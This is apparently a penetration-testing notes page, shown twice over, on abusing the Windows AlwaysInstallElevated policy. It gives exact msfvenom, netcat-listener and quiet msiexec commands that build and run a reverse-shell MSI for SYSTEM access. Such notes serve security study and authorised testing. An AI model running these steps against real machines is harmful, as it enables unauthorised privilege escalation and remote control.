Always Install Elevated

Overview

The Always Install Elevated policy is a setting in Windows that allows standard users to install applications with elevated privileges. When this policy is enabled, any application installation initiated by a standard user can run with administrative rights, effectively bypassing User Account Control (UAC) prompts.

How It Works

When the Always Install Elevated setting is enabled, the following occurs:

Elevation of Installations: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.
UAC Bypass: Users do not see the standard UAC prompt, which can prevent them from being aware of the risks associated with the installation of potentially harmful software.

Creating and Executing a Malicious MSI Package for Reverse Shell Access

Generate the Malicious MSI Package:
- Use msfvenom to create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to 10.10.10.10, and the local port (LPORT) is set to 4444.
- The command to generate the MSI package is as follows:
  dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi
Transfer the MSI File:
- After generating the dbs.msi file, transfer it to the target machine where you want to execute it.
Set Up a Netcat Listener:
- On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed:
  nc -lnvp 4444
Execute the MSI Package:
- On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system:
  C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart

After executing this command, the target machine will connect back to your listener, providing you with a reverse shell with system privileges.

PreviousServer Operators NextPrint Operators

Last updated 8 months ago

Was this helpful?

Always Install Elevated

Overview

How It Works

When the Always Install Elevated setting is enabled, the following occurs:

Elevation of Installations: Standard users can install applications without being prompted for administrator credentials. This means that any MSI (Microsoft Installer) package executed will run with elevated permissions.
UAC Bypass: Users do not see the standard UAC prompt, which can prevent them from being aware of the risks associated with the installation of potentially harmful software.

Creating and Executing a Malicious MSI Package for Reverse Shell Access

Generate the Malicious MSI Package:
- Use msfvenom to create a malicious MSI file that will initiate a reverse shell connection back to your listener. In this example, the local host (LHOST) is set to 10.10.10.10, and the local port (LPORT) is set to 4444.
- The command to generate the MSI package is as follows:
  dollarboysushil@kali$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.10.10 lport=4444 -f msi > dbs.msi
Transfer the MSI File:
- After generating the dbs.msi file, transfer it to the target machine where you want to execute it.
Set Up a Netcat Listener:
- On your attacking machine, set up a netcat listener to catch the reverse shell once the MSI package is executed:
  nc -lnvp 4444
Execute the MSI Package:
- On the target machine, run the following command to execute the malicious MSI package quietly, without displaying any prompts or restarting the system:
  C:\> msiexec /i c:\users\dollarboysushil\desktop\dbs.msi /quiet /qn /norestart

After executing this command, the target machine will connect back to your listener, providing you with a reverse shell with system privileges.

PreviousServer Operators NextPrint Operators

Last updated 8 months ago

Was this helpful?